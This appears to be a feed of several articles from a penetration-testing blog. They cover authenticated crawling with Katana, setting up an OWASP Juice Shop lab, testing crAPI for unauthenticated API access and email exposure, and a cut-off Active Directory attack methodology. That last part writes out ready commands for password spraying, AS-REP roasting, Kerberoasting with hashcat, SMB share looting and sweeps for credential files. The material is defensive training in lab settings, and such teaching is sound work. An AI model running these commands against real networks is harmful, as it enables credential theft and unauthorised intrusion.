In the comprehensive process of web application security auditing, an essential technique involves enhancing our crawling capabilities by integrating authentication cookies. This step is crucial as it unveils links and resources accessible only after authentication, offering deeper insights into the application’s security landscape. The journey begins with registering on the application, which, in the case of JuiceShop, involves obtaining a JWT (JSON Web Token). This token is vital for authenticating against the application&apos;s API, and [I have delved into its specifics in a dedicated chapter of the Hacking APIs series](https://www.kayssel.com/post/api-hacking-3/).

![](/content/images/2024/02/image-26.png)

User registration

Retrieving this JWT can be achieved in a couple of ways. You could use the browser&apos;s developer tools, accessed with the F12 key, to inspect the cookies directly. Alternatively, proxy tools such as mitmproxy, Burp Suite, or OWASP ZAP can be employed to capture the necessary requests and thus obtain the tokens and cookies used in authenticated sessions.

![](/content/images/2024/02/image-27.png)

Cookies in Firefox

![](/content/images/2024/02/image-30.png)

Cookies in mitmproxy

Once the JWT is in hand, the next course of action is to export this token, along with any relevant cookies, into a file. This file then serves as a bridge to the next step of our process. By feeding this information into Katana’s crawling mechanism with the `-H` argument, we ensure the inclusion of the authentication header in our crawl. To guarantee that the integration works as intended, I recommend using the `-proxy` argument for debugging purposes. This allows for real-time monitoring of the requests, affirming that the authentication details are correctly applied to the tool&apos;s operations.

![](/content/images/2024/02/image-32.png)

Cookies on file

The effectiveness of this method is evidenced in the seamless integration of authentication cookies into Katana, as would be illustrated in an accompanying image.

![](/content/images/2024/02/image-34.png)

Requests with authentication using Katana

Though the procedure may appear direct and uncomplicated, the critical practice of debugging requests to ensure that session cookies are effectively passed to Katana&apos;s requests cannot be overstated. This step is essential in web application security auditing, as it verifies the authenticity and effectiveness of our crawling efforts.

![](/content/images/2024/02/image-33.png)

Visualization that the requests is made successfully

## The Power Of Parameters

In our discussions on optimizing the use of katana for web application security assessments, I&apos;ve emphasized my general approach of not applying filters directly within katana. However, there exists a particularly useful parameter that, under certain circumstances, merits consideration. This parameter shines when automating the detection of vulnerabilities, and it&apos;s one we&apos;ll be leveraging in our future explorations.

The parameter in question is `-f qurl`. Its primary function is to hone in on parameters within GET requests—specifically, those that utilize the &quot;?&quot; character to delineate parameters. This focus is invaluable because it allows us to narrow down our examination to the points within an application where user input is directly processed in the URL, often a hotspot for potential vulnerabilities.

To apply this parameter alongside others for a comprehensive and targeted analysis, the command structure would look something like this:

```bash
katana -u &quot;&lt;url&gt;&quot; -f qurl -jc -headless

```

![](/content/images/2024/02/image-35.png)

Links found with parameters

# Conclusion

As we close this chapter, we reflect on the comprehensive journey through the landscape of web application security. The sophisticated art of web crawling, enriched by strategic methodologies and the adept use of Katana, has prepared us to face the complexities of modern web applications. This exploration goes beyond mere detection, enabling us to understand and mitigate the myriad vulnerabilities that challenge the security of the digital world. It&apos;s a testament to the evolving nature of security auditing, urging us to constantly seek out new tools and techniques to safeguard our digital frontiers.

# Additional Resources

[GitHub - projectdiscovery/katana: A next-generation crawling and spidering framework.](https://github.com/projectdiscovery/katana)

[GitHub - vavkamil/awesome-bugbounty-tools: A curated list of various bug bounty tools](https://github.com/vavkamil/awesome-bugbounty-tools?tab=readme-ov-file#Content-Discovery)</content:encoded><author>Ruben Santos</author></item><item><title>Web Application Hacking Fundamentals: Starting the Journey</title><link>https://www.kayssel.com/post/hacking-web-1</link><guid isPermaLink="true">https://www.kayssel.com/post/hacking-web-1</guid><description>We delve into web app hacking basics, covering essential tools, OWASP Juice Shop lab setup, and key skills in Linux, Python, and security. The first step towards mastering web security.</description><pubDate>Wed, 21 Feb 2024 07:51:12 GMT</pubDate><content:encoded># Introduction to the series

Welcome to the new series I&apos;m embarking on, focused on hacking web applications. These applications are a common sight in penetration testing, especially for those just starting their journey in the field. From my experience, I&apos;ve noticed a common challenge among newcomers: the overwhelming feeling of navigating through the methodology required for a web audit. There&apos;s often confusion about whether they&apos;re covering too much ground or if they&apos;ve thoroughly completed their task, leading to a tangled process. This series aims to demystify the process for beginners, providing a clear path forward.

Moreover, we&apos;re diving into how to audit web applications without the need for Burp Pro or any paid tools. We&apos;ll leverage open-source tools, making this series a haven for those who prefer working directly from the terminal. That&apos;s right, all you&apos;ll need is a terminal and a browser to follow along.

However, it&apos;s important to note that this series won&apos;t cover every vulnerability out there. Instead, our focus will be on how to identify vulnerabilities and automate their detection. For those eager to delve deeper into specific techniques or vulnerabilities, I highly recommend Burp&apos;s academy as a resource. It offers comprehensive coverage and dedicated labs for a wide range of vulnerabilities. Here is the link to Burp&apos;s academy for further exploration:

[Web Security Academy: Free Online Training from PortSwigger](https://portswigger.net/web-security)

This approach is designed to make web application auditing accessible and engaging, whether you&apos;re just starting out or looking to refine your skills with open-source tools. Let&apos;s embark on this journey together, armed with nothing but our terminals and a thirst for knowledge.

# Level you will need

For this enlightening journey through web application hacking, there are three essential skills you&apos;ll need to embark effectively:

1.  **Proficiency with the Terminal and Linux Tools**: The backbone of this series is the terminal. Every test and task we undertake will be executed within this environment, utilizing an array of Linux commands. A solid grasp of these commands and the ability to navigate the terminal environment with ease are imperative. For those who might feel less confident or are newcomers to the Linux world, don&apos;t worry. In the resources section, I&apos;ll provide a link to a complimentary course designed to get you up to speed.
2.  **Basic Understanding of Web Vulnerabilities**: While the series aims to guide you through identifying and exploiting vulnerabilities, a foundational knowledge of what these vulnerabilities are is crucial. We won&apos;t delve into the minutiae of each vulnerability; instead, our focus will be on detection and exploitation techniques. Therefore, having some prior knowledge or experience in this area will be incredibly beneficial as we progress.
3.  **Basic Programming Skills, Especially in Python**: Automation and scripting will be key components of our hacking endeavors. Python, with its vast ecosystem and readability, will be our primary tool for extending the capabilities of other tools we&apos;ll be using. Additionally, familiarity with Bash or similar scripting languages is necessary, as they will also play a significant role in our processes. A basic level of programming proficiency will enable you to follow along and engage fully with the series.

These prerequisites are designed to ensure that you can follow the series effectively and make the most out of the techniques and strategies we&apos;ll explore. Remember, the resources section is there to support your learning journey, providing links and materials to bolster your skills where needed. Let&apos;s gear up for an engaging and educational adventure into the world of web application hacking, leveraging the power of open-source tools and the command line.

# Basic Tools diagrams

![](/content/images/2024/02/image-21.png)

Kicking off my series on hacking web applications, let’s dive into the essential toolkit for conducting a comprehensive web penetration test. Instead of categorizing tools, I&apos;ll focus on the specific activities and the types of tools needed for each. These activities are central to the pentesting process, and the tools I&apos;ve selected are pivotal for executing these main activities in web application penetration testing:

1.  **Information Gathering and Web Scraping**: The first step in any web application penetration test is gathering as much information as possible about the target. Tools that automate the collection of URLs, endpoints, and other relevant data from the web application are crucial here. Instead of focusing on a single tool, I look for tools that can efficiently crawl a web application and compile a comprehensive list of resources.
2.  **Fuzzing and Asset Discovery**: Once I have a map of the application, the next step is to discover hidden or non-obvious assets, including directories, files, and functionalities not directly linked within the application. Fuzzing tools come into play here, helping me guess and identify these assets. My preference leans towards tools that can automate this process, offering customization options to fine-tune my fuzzing techniques.
3.  **Interception and Request Manipulation with Proxies**: A significant part of penetration testing involves intercepting and manipulating web requests. Proxies are indispensable for this purpose, allowing me to view, modify, and replay requests. I rely on proxies that offer advanced features like SSL interception, request modification, and automated testing capabilities.
4.  **Vulnerability Scanning and Exploitation**: Finally, identifying vulnerabilities and potential points of exploitation is the culmination of the testing process. Vulnerability scanners that can automate the detection of common vulnerabilities and provide actionable insights are a key part of my toolkit. However, I also value tools that allow for manual testing and exploration, as automation cannot catch every possible security issue.

Throughout this series, I&apos;ll delve into how I use these tools in a real-world context, integrating them into my methodology to conduct thorough and effective web application penetration tests.

# Laboratory

Setting up a practical lab environment is crucial for me to apply and refine the hacking techniques I discuss in this series. A lab provides a safe, legal, and controlled environment for me to practice my skills. That&apos;s why I chose the OWASP Juice Shop project as my lab environment. OWASP Juice Shop is a deliberately insecure web application designed for training, educational purposes, and to test web application security tools and techniques.

### Why OWASP Juice Shop?

OWASP Juice Shop encompasses a wide range of web vulnerabilities, making it an ideal choice for a hands-on learning environment. It covers the OWASP Top 10 vulnerabilities and beyond, offering me a comprehensive platform to practice attacks and testing strategies in real-time without any legal implications.

### Setting Up Your Lab with Docker

Docker simplifies the process of deploying applications and their environments. To use OWASP Juice Shop as your lab, you first need to have Docker installed on your machine. Docker allows you to run applications in isolated environments called containers. Here&apos;s a brief guide on setting up OWASP Juice Shop using Docker:

-   **Install Docker**: If Docker isn&apos;t already installed on your machine, you&apos;ll need to install it. The process varies depending on your operating system, but for Ubuntu server machines, detailed instructions are provided in the [link shared in the series](https://www.kayssel.com/post/lab-3/#setting-up-an-ubuntu-server-in-proxmox-for-internal-network-simulation).
-   **Pull OWASP Juice Shop Docker Image**: Once Docker is installed, you can pull the OWASP Juice Shop image from Docker Hub. Open your terminal and execute the following command:bash

```bash
docker pull bkimminich/juice-shop

```

This command downloads the latest Juice Shop image to your local machine.

-   **Run OWASP Juice Shop**: After pulling the image, run the following command to start the Juice Shop application:

```bash
docker run --rm -p 3000:3000 bkimminich/juice-shop

```

This command starts a Docker container with the Juice Shop application and maps its service port (3000) to the same port on your host machine. The `--rm` flag automatically removes the container when it&apos;s stopped, ensuring that your setup remains clean.

### Accessing OWASP Juice Shop

With the application running, you can access OWASP Juice Shop by navigating to `http://localhost:3000` in your web browser. You&apos;re now ready to begin practicing various web application hacking techniques in a realistic, yet secure and ethical environment.

![](/content/images/2024/02/image-22.png)

# Conclusions

As we conclude the inaugural chapter of this series on hacking web applications, it&apos;s clear that we&apos;re embarking on a journey that not only aims to demystify the complexities of web application penetration testing but also to arm you with the knowledge and tools needed to navigate this challenging yet rewarding field.

Throughout this first installment, we&apos;ve laid the groundwork for what promises to be an in-depth exploration into the art and science of web application security. We&apos;ve discussed the importance of understanding the methodology behind a web audit, the necessity of proficiency with terminal and Linux tools, and the foundational knowledge of web vulnerabilities and basic programming skills, particularly in Python.

The introduction of open-source tools and the setup of a practical lab environment using the OWASP Juice Shop project highlights our commitment to providing accessible and hands-on learning experiences. These tools and resources are not just meant to serve as a guide but as a companion in your journey towards becoming proficient in web application hacking.

By focusing on the essential activities of information gathering, fuzzing, interception, and vulnerability scanning, we&apos;ve begun to peel back the layers of web application security. Each tool and technique introduced here is a stepping stone towards a deeper understanding and mastery of the field.

As we move forward, remember that this series is designed to evolve with you, whether you&apos;re just starting out or looking to refine your existing skills. The journey into web application hacking is both broad and deep, and what we&apos;ve covered in this first chapter is just the tip of the iceberg.

Looking ahead, we&apos;ll dive deeper into each category of tools, exploring more advanced techniques, and tackling real-world challenges. The OWASP Juice Shop will serve as our sandbox, where theory meets practice, and where you&apos;ll have the opportunity to apply what you&apos;ve learned in a controlled environment.

I invite you to stay tuned for the next chapters, where we&apos;ll continue to build upon the foundation laid here, exploring new vulnerabilities, sharpening our skills, and furthering our understanding of how to protect web applications from emerging threats.

This series is more than just a collection of articles; it&apos;s a pathway to mastery in web application security. Thank you for joining me on this journey. Together, let&apos;s continue to push the boundaries of what&apos;s possible in the realm of web application hacking.

# Resources

[Challenge solutions · Pwning OWASP Juice Shop](https://help.owasp-juice.shop/appendix/solutions.html)</content:encoded><author>Ruben Santos</author></item><item><title>Unveiling Shadows: Navigating the Risks of Unauthenticated API Access and Excessive Information Exposure</title><link>https://www.kayssel.com/post/unauth-excessive</link><guid isPermaLink="true">https://www.kayssel.com/post/unauth-excessive</guid><description>This article explores Unauthenticated API Access and Excessive Information Exposure, highlighting tools like Burp Suite, Autorize, and Aquatone for identifying and mitigating these vulnerabilities in API security.</description><pubDate>Fri, 16 Feb 2024 12:30:12 GMT</pubDate><content:encoded># Introduction

Welcome to the latest chapter in our dedicated API hacking series. Today, we embark on a detailed exploration of two pivotal vulnerabilities that present significant risks to API security: Unauthenticated API Access and Excessive Information Exposure. This chapter is designed to not only enhance your understanding of these vulnerabilities, but also to provide you with practical strategies for their identification and mitigation. Leveraging the power of tools like Burp Suite and Aquatone, we&apos;ll dive into real-world scenarios that bring these abstract concepts to life. As we dissect these vulnerabilities, our goal is to arm you with the knowledge and expertise necessary to fortify your applications against potential breaches. Prepare to deepen your insights into the critical aspects of API security, ensuring you&apos;re well-equipped to navigate the challenges of the digital age.

# **Unauthenticated API Access**: Unveiling Hidden Entrances

Unauthenticated API access as a vulnerability refers to a security flaw in which APIs can be accessed without any form of authentication. This means that sensitive endpoints within an application&apos;s API are exposed to potential unauthorized use, allowing attackers to access or manipulate private data, execute unauthorized functions, or potentially gain further access to the system without needing to verify their identity.

This vulnerability arises from insufficient security measures during API development and deployment, where endpoints are not properly secured with authentication mechanisms. As we&apos;ve seen in one of the chapters of our series, the application in question manages authentication using JSON Web Tokens (JWT). Despite JWT&apos;s potential for securing access, without rigorous implementation and checks, APIs remain vulnerable to unauthorized access, posing significant security risks.

The consequences of exploiting unauthenticated API access can be severe, ranging from data breaches and loss of sensitive information to system compromise and operational disruption. Attackers can use unauthenticated access to bypass security controls, elevate their privileges within a system, or launch further attacks against other parts of the network.

## **Practical Exploration: Unmasking Unauthenticated Access**

To identify vulnerabilities of this kind, it&apos;s best to have thoroughly examined the entire application and gathered a substantial number of requests in Burp&apos;s history. Detecting such vulnerabilities entails testing each request without the JWT to determine if the same information can be accessed.

While scrutinizing requests in a small-scale application like crAPI may be manageable, the task becomes considerably more cumbersome in larger, real-world applications where the volume of requests is typically much higher. Thankfully, there are solutions available to automate parts of this process. One commonly used tool in conjunction with Burp is Autorize, known for its ease of use and efficiency in navigating through extensive request logs. If you&apos;re interested, you can explore its repository for further details.

[GitHub - PortSwigger/autorize: Automatic authorization enforcement detection extension for burp suite written in Jython developed by Barak Tawily in order to ease application security people work and allow them perform an automatic authorization tests](https://github.com/PortSwigger/autorize)

On a different note, I&apos;ve decided to take a different approach by leveraging a combination of other tools to enhance visualization. Allow me to introduce you to Aquatone. This tool is primarily tailored for external pentesting, generating concise reports with screenshots of discovered web pages for effortless visualization. However, it also proves to be quite effective for authorization testing, offering a convenient overview of vulnerable requests or endpoints.

You&apos;ll quickly grasp its utility. Here&apos;s the GitHub link for you to download and explore further.

[GitHub - michenriksen/aquatone: A Tool for Domain Flyovers](https://github.com/michenriksen/aquatone)

To proceed, you&apos;ll need to copy all the URLs you&apos;ve collected in Burp Suite:

![](/content/images/2024/02/image-18.png)

Copy URLs

Once you&apos;ve completed that step, we&apos;ll initiate Aquatone as follows:

```bash
cat ../endpoints.txt | aquatone

```

![](/content/images/2024/02/image-10.png)

Running Aquatone

The execution should yield the following results, with our primary interest lying in &quot;aquatone\_report.html&quot;.

![](/content/images/2024/02/image-11.png)

Aquatone results

Accessing the report with Chromium, we&apos;ll be presented with all the results, allowing us to swiftly identify the endpoints of interest, thanks to Aquatone&apos;s categorization. In the image below, the highlighted endpoint stands out as particularly significant, revealing the outcome of a successful API request made without the inclusion of a JWT, thereby indicating a vulnerability:

![](/content/images/2024/02/image-12.png)

Vulnerable request found

![](/content/images/2024/02/image-13.png)

Information obtained without authentication

The vulnerable request pertains to viewing past purchases within the application. This can be verified by utilizing Burp Suite and accessing the functionality to view past purchases, as demonstrated in the following two images:

![](/content/images/2024/02/image-17.png)

Past orders

![](/content/images/2024/02/image-8.png)

Vulnerable request captured with Burp

Acknowledging that this request is accessible without providing a JWT, we can endeavor to visualize past purchases of other users. To achieve this, we can utilize a file containing requests that modify the final ID, presuming it corresponds to different purchases made by users. In the following image, you can observe how I have inserted IDs ranging from 1 to 10 using the Fish shell.

```bash
for i in (seq 1 10)
      echo &quot;http://192.168.20.120:8888/workshop/api/shop/orders/$i&quot; &gt;&gt; urls.txt
  end

```

![](/content/images/2024/02/image-14.png)

File created with different possibilities

As depicted in the following image, in the second row, we observe the diverse responses from the API, enabling us to inspect past orders of other users, thereby demonstrating the vulnerability:

![](/content/images/2024/02/image-15.png)

Output with different endpoints

![](/content/images/2024/02/image-19.png)

Access to other user&apos;s information

# **Excessive Information Exposure**: Beyond the Surface of API Responses

Following our exploration of &quot;Unauthenticated Access,&quot; a vulnerability that allows attackers to gain access to system functions or data without proper authentication, we delve into another critical but often overlooked risk: &quot;Excessive Information Exposure.&quot;

&quot;Excessive Information Exposure&quot; occurs when an application inadvertently discloses more information than necessary, typically through its API responses. This can range from personal data to system details that could pave the way for further exploitation. Unlike Unauthenticated Access, which directly permits unauthorized entry into systems, Excessive Information Exposure is a subtler vulnerability resulting from a design oversight. This oversight leads to the unnecessary sharing of data, such as detailed error messages, API keys, and user information, that should be restricted or obfuscated.

The bridge between Unauthenticated Access and Excessive Information Exposure is of particular concern. While the former opens the door to unauthorized system interactions, the latter can provide the critical information needed to exploit those interactions more effectively. Together, they create a compounded security risk where the attacker, equipped with excess information, can navigate and manipulate the system with greater precision, potentially leading to identity theft, unauthorized access, and system compromise.

Mitigating these vulnerabilities requires a multifaceted approach. Starting with the principle of least privilege, especially in data sharing and system access, it&apos;s essential to implement rigorous data filtering, proper access controls, and continuous monitoring and auditing of both access patterns and data exposure.

## **Case Study: The Perils of Excessive Information Exposure**

We&apos;ve made considerable progress auditing nearly every part of our application. Yet, there&apos;s one segment we haven&apos;t thoroughly examined—the application&apos;s forum. Upon closer inspection, it becomes apparent that the forum hosts comments from three default users.

![](/content/images/2024/02/image-1.png)

Comment sections

Delving into these comments offers an opportunity to test various inputs by replying to existing comments or creating new ones. Despite experimenting with numerous payloads aimed at triggering Cross-Site Scripting (XSS)—a vulnerability we&apos;ll explore in an upcoming series on web hacking—none have proven successful.

![](/content/images/2024/02/image-6.png)

XSS payload

![](/content/images/2024/02/image-7.png)

XSS not interpreted

This lack of success indicates that the application effectively sanitizes user input, thwarting attempts at exploiting this potential vulnerability. However, a deeper investigation into the network requests made while interacting with the forum reveals a significant oversight: the exposure of other users&apos; email addresses. Such information, which unnecessarily reveals more data than required for front-end operations, signals an Excessive Information Exposure vulnerability.

At first glance, this might not seem like a critical issue. Yet, when combined with previously identified vulnerabilities, such as flawed user authentication, this oversight could enable attackers to change the passwords of other users arbitrarily, bypassing the need to ascertain their email addresses.

![](/content/images/2024/02/image-2.png)

E-mail address of persons making comment

![](/content/images/2024/02/image-4.png)

Specific comment

# Conclusions

Our in-depth exploration of Unauthenticated API Access and Excessive Information Exposure vulnerabilities throughout this series has unveiled the intricate challenges and potential threats these weaknesses pose to data security and system functionality. The practical scenarios dissected, alongside the deployment of tools like Burp Suite and Aquatone, have shed light on the paramount importance of enforcing stringent security measures and adhering to the principle of least privilege within application ecosystems. These episodes have emphatically highlighted the critical need for robust authentication protocols, effective data filtering processes, and comprehensive access control measures to counteract the risks presented by these vulnerabilities.

Moreover, the adoption of continuous monitoring and auditing strategies stands out as a vital practice for the timely identification and rectification of security vulnerabilities. The interrelated nature of Unauthenticated API Access and Excessive Information Exposure underscores the necessity for a holistic cybersecurity approach. Addressing one area of vulnerability not only strengthens specific defenses but also bolsters the overall security posture against a spectrum of potential threats.

As we draw this chapter to a close, the enduring message is clear: the fight against cyber threats is a perpetual endeavor that requires unwavering diligence, innovative solutions, and a steadfast commitment to safeguarding our digital domains. This journey through the realms of Unauthenticated Access and Excessive Information Exposure serves as a poignant reminder of the ongoing need for comprehensive security strategies. These strategies are crucial in protecting sensitive data and preserving system integrity in an era where digital connectivity is ubiquitous. Let this series be a beacon, guiding us toward more secure and resilient digital infrastructures in our collective quest to navigate the complexities of the digital age.</content:encoded><author>Ruben Santos</author></item><item><title>Active Directory Pentesting Methodology: Crafting Strategies for Success</title><link>https://www.kayssel.com/post/how-to-win-and-fight-against-active-directory</link><guid isPermaLink="true">https://www.kayssel.com/post/how-to-win-and-fight-against-active-directory</guid><description>In this series, we delved into Active Directory fundamentals, covering essential concepts, advanced reconnaissance, privilege escalation, lateral movement, and domain dominance. We explored techniques like Pass the Hash, Pass the Ticket, and Golden Ticket for comprehensive network penetration.</description><pubDate>Sun, 11 Feb 2024 14:52:18 GMT</pubDate><content:encoded># Introduction

Welcome to the culmination of our journey into the realm of Active Directory auditing. Throughout this series, we&apos;ve embarked on a comprehensive exploration, unraveling the intricacies of this fundamental component of modern network security. Designed with aspiring pentesters in mind, this series aims to demystify the complexities of Active Directory, providing a solid foundation upon which to build your expertise.

As we delve into this final chapter, we&apos;ll consolidate the knowledge accumulated thus far, distilling the essence of each phase into a streamlined methodology. Whether you&apos;re a novice seeking to grasp the basics or a seasoned professional looking to refine your techniques, this article offers a high-level overview of the key concepts and fundamental strategies essential for conducting an effective Active Directory audit.

So, whether you&apos;re embarking on your first foray into network security or seeking to enhance your skills in this ever-evolving field, join me as we navigate the intricate landscape of Active Directory auditing. Together, let&apos;s unlock the secrets of network penetration and control, empowering ourselves to safeguard against the myriad threats lurking within the digital domain.

# Navigating this Article: A Guide to Effective Use

During this article, I&apos;ll provide a high-level overview of the various phases typically involved in an Active Directory audit. The aim is to give you a simplified yet comprehensive outline of all the concepts and basic techniques covered throughout the series. Throughout the article, I&apos;ll highlight specific sections that link to the corresponding chapters where the techniques were discussed in detail. Additionally, there may be instances where I include entire chapters to ensure clarity, as condensing the content excessively could compromise its effectiveness. That being said, I trust you&apos;ll find this overview helpful in grasping the fundamentals of Active Directory auditing. Let&apos;s dive in!

# Exploring Fundamental Concepts: Building a Solid Foundation

The fundamental theory required to comprehend the components of Active Directory is presented in the initial chapter. While Active Directory encompasses a wide array of concepts, this chapter will provide you with the essential understanding of its inner workings.

[Initiating the Active Directory Odyssey: Unveiling Key Concepts and Building the Foundations](https://www.kayssel.com/post/active-directory-1/)

On the other hand, for a deeper dive into users, groups, and Active Directory machines, I&apos;ve crafted the following chapter to provide an introductory overview of these components and how to enumerate them:

[User-Centric Pentesting: Unveiling Secrets with PowerView and PowerSploit](https://www.kayssel.com/post/active-directory-5/)

If you have the opportunity and resources, I strongly recommend setting up your own lab environment. You can achieve this by repurposing an older computer using Proxmox or creating a virtualized environment with VMware or VirtualBox. I have designed a dedicated lab creation series that addresses this specific need. Feel free to explore it if you wish to dive deeper into this hands-on experience.

[Building the Offensive Security Playground: A Step-by-Step Guide](https://www.kayssel.com/series/offensive-lab/)

# Identifying Domain Controllers: The First Step

Typically, audits of this nature are conducted with the assumption that an attacker has already gained access to the company&apos;s internal network. As a result, one of the initial and crucial steps is to identify the location of the domain controllers. This is a pivotal task, as domain controllers often contain valuable information and serve as potential targets for future attacks.

To enumerate these domain controllers, you can employ various tools and methods. [For instance, using &apos;nmap&apos; to scan for the LDAP port or &apos;nslookup&apos; to query the SRV record for LDAP can be effective](https://www.kayssel.com/post/active-directory-2-computers/#domain-controllers):

```bash
sudo nmap -sS --open -p389 192.168.253.0/24
nslookup -q=srv _ldap._tcp.dc._msdcs.shadow.local

```

Once you&apos;ve initiated the process, it becomes vital to gather additional information from the machines within the domain. [In this context, leveraging NTLM via SMB proves to be an ideal approach](https://www.kayssel.com/post/introduction-to-active-directory-6-ntlm-basics/#reconnaissance-tasks-gathering-intelligence):

```bash
ntlm-info smb 192.168.253.130

```

Continuing with SMB, another avenue worth exploring is identifying machines that allow connections with null sessions. This can be accomplished using either CrackMapExec or Enum4linux:

&lt;details&gt;
&lt;summary&gt;Using CrackMapExec:&lt;/summary&gt;

```bash
crackmapexec smb &lt;ip_range&gt; -u &quot;&quot; -p &quot;&quot;

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;Using Enum4linux:&lt;/summary&gt;

```bash
enum4linux -u &quot;&quot; -p &quot;&quot; -a &lt;ip&gt;

```
&lt;/details&gt;


When using enum4linux, it&apos;s important to recognize that it can provide a wealth of information, particularly if you gain access with null credentials:

1.  **User and Group Data:** Enum4linux can uncover user and group details, such as usernames, descriptions, and memberships, offering valuable insights for reconnaissance.
2.  **Share and Permissions:** It systematically lists shared folders along with their associated permissions, highlighting potential vulnerabilities arising from open shares with weak security measures.
3.  **Password Policy and Hashes:** Enum4linux has the capability to expose password policies, facilitating password-based attacks. In certain scenarios, it can also extract password hashes, which can be used for offline cracking.

Furthermore, it&apos;s worth attempting to gain access to machines through the Guest user account. The commands remain the same as before, with the only difference being setting the username (`-u`) to &quot;Guest&quot;.

In many cases, this approach will grant you access to a machine, enabling you to inspect its shared folders. Fortuitously, you may come across domain credentials, significantly enhancing your chances of success. It&apos;s worth noting that, in some instances, domain administrator accounts have been discovered within these folders. To establish a connection, you can utilize the following command:

```bash
impacket-smbclient -no-pass &lt;IP_Target&gt;

```

To download files locally, you can also use the following command:

```bash
smbclient //&lt;ip&gt;/&lt;share&gt;
mask &quot;&quot;
recurse 
prompt 
mget*

```

In addition to these services, exploring internal network websites can yield valuable access to machines and credentials with high privileges. Often overlooked and outdated, these pages offer ripe opportunities for investigation. To streamline this process, two key tools are recommended assuming access to an internal subnet.

Firstly, [Aquatone](https://github.com/michenriksen/aquatone) provides a comprehensive list of pages alongside corresponding screenshots, offering a quick overview of all available pages:

```bash
cat ips.txt | aquatone -ports xlarge

```

This generates a file named &quot;aquatone\_urls.txt&quot; containing all discovered URLs. Subsequently, passing this file to a vulnerability scanner like [Nuclei](https://github.com/projectdiscovery/nuclei) completes the investigation:

```bash
cat aquatone_urls.txt | nuclei

```

Nuclei often unveils access points for pages with flawed credentials or CVEs, potentially granting even remote code execution. While a detailed discussion of these tools is reserved for future articles, they remain essential components of any comprehensive assessment.

Finally, [for a relatively secure approach to username enumeration without triggering account lockouts within the domain, you can utilize Kerbrute](https://www.kayssel.com/post/kerberos/#kerberos-brute-force-attack-cracking-the-code). The following command accomplishes this task:

```bash
/kerbrute_linux_amd64 userenum -d shadow.local usernames.txt 

```

# Acquiring Valid Credentials: Gaining Access to the Network

In the previous phase, you should have obtained Active Directory usernames. However, what&apos;s crucial now is acquiring valid credentials, specifically the passwords associated with these accounts. One effective method for this is to employ the Kerberos ASREProast attack, which enables the retrieval of tickets that, when cracked, can yield a user&apos;s password.

To execute this attack, you can use the following commands:

1.  Obtain tickets with Impacket&apos;s `GetNPUsers`:

```bash
impacket-GetNPUsers -userfile usernames.txt -dc-ip 192.168.253.130 -format hashcat -outputfile asreproast-hashes.txt

```

2.  Attempt to crack the obtained hashes:

```bash
hashcat -m 18200 --force -a 0 asreproast-hashes.txt pass.txt

```

An alternative approach to gaining access is to execute brute force attacks using tools like crackmapexec or kerbrute. However, it&apos;s crucial to consider the domain&apos;s password policy to prevent user account lockouts before proceeding with these attacks.

[Using kerbrute for password spraying with a safe mode:](https://www.kayssel.com/post/kerberos/#kerberos-brute-force-attack-cracking-the-code)

```bash
./kerbrute_linux_amd64 passwordspray -d shadow.local usernames.txt Password123 --safe

```

Brute forcing with Kerbrute, considering the password policy:

```bash
cat userpass.txt | ./kerbrute -d shadow.local bruteforce -

```

[Using crackmapexec for SMB with a list of usernames and a common password:](https://www.kayssel.com/post/introduction-to-active-directory-6-ntlm-basics/#from-reconnaissance-to-credentials)

```bash
crackmapexec smb 192.168.253.130 -u users.txt -p Password1

```

&lt;details&gt;
&lt;summary&gt;Attempting SMB access with a specific username and a password list:&lt;/summary&gt;

```bash
crackmapexec smb 192.168.253.128 -u &quot;ironhammer&quot; -p password.txt

```
&lt;/details&gt;


Finally, if you are not directly connected via VPN, you may attempt to obtain [NTLMv2 hashes](https://www.kayssel.com/post/introduction-to-active-directory-6-ntlm-basics/#connecting-to-net-ntlm-hashes-retrieval) or execute [NTLM relay](https://www.kayssel.com/post/introduction-to-active-directory-6-ntlm-basics/#leading-to-ntlm-relay-attack). These attacks have the potential to provide both usernames and passwords for accessing machines. In the optimal scenario, utilizing the &apos;NTLM Relay&apos; attack, you can intercept traffic from administrator users, potentially allowing you to dump the Security Account Manager (SAM) from the target machines.

# Advanced Enumeration with Domain Users: Expanding Your Reach

Once you&apos;ve acquired a domain user, a multitude of possibilities within Active Directory become accessible. One of the most compelling methods for obtaining credentials with elevated privileges in the domain is through the [Kerberoast attack](https://www.kayssel.com/post/kerberos/#harnessing-kerberoast-targeting-the-heart-of-kerberos-tgs-exchange):

1.  Retrieve Service Principal Names (SPNs) using Impacket:

```bash
impacket-getUserSPNs &apos;shadow.local/beruinsect:Password4&apos; -dc-ip 192.168.253.130 -outputfile kerberoast-hashes.txt

```

2.  Attempt to crack the obtained Kerberoast hashes:

```bash
hashcat -m 13100 --force -a 0 kerberoast-hashes.txt pass.txt

```

Alternatively, you could initiate login sessions on other machines using the user accounts you&apos;ve identified. There were primarily two common options for this, which we encountered: evil-winrm and psexec. Additionally, Remote Desktop Protocol (RDP) can serve as another viable method for accessing and managing machines within the network. However, to utilize any of these methods successfully, your user account or the targeted computer had to meet certain requirements. I delved deeper into these concepts in the following chapter.

[Mastering Windows Remote Secrets: Techniques and Tools for Unveiling Hidden Realms](https://www.kayssel.com/post/active-directory-3-windows-computers/)

For practical purposes, here are three example commands employing these tools:

1.  `evil-winrm -i 192.168.253.130 -u administrator -p &apos;P@$$w0rd!&apos;`
2.  `impacket-psexec Administrator@192.168.253.130`
3.  `xfreerdp /d:domain /u:&lt;username&gt; /p:&lt;password&gt; /v:&lt;ip&gt;`

After logging in, the first thing I recommend is to scan all directories for sensitive files to find credentials or passwords. You&apos;ll be surprised how often such information is left accessible on machines. To automate this process, you can utilize the following PowerShell script:

```powershell
 Get-ChildItem -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.kdbx,*.ini,*.log,*.xml,*.git* -File -Recurse -ErrorAction SilentlyContinue -Exclude desktop.ini 

```

Another alternative is to use LaZagne. This tool allows you to automate the gathering of credentials.

[GitHub - AlessandroZ/LaZagne: Credentials recovery project](https://github.com/AlessandroZ/LaZagne)

On the other hand, it&apos;s recommended that you gather information from the entire domain to better understand how to reach your targets effectively. Here are some questions you should consider:

![](/content/images/2023/10/image-82.png)

Anyway, to delve deeper into the process of collecting all this information with tools like PowerView, I&apos;ve dedicated an entire chapter to this topic.

[Active Directory Enumeration: Automated and Manual Techniques for Privilege Escalation](https://www.kayssel.com/post/introduction-to-active-directory-9-enumeration/)

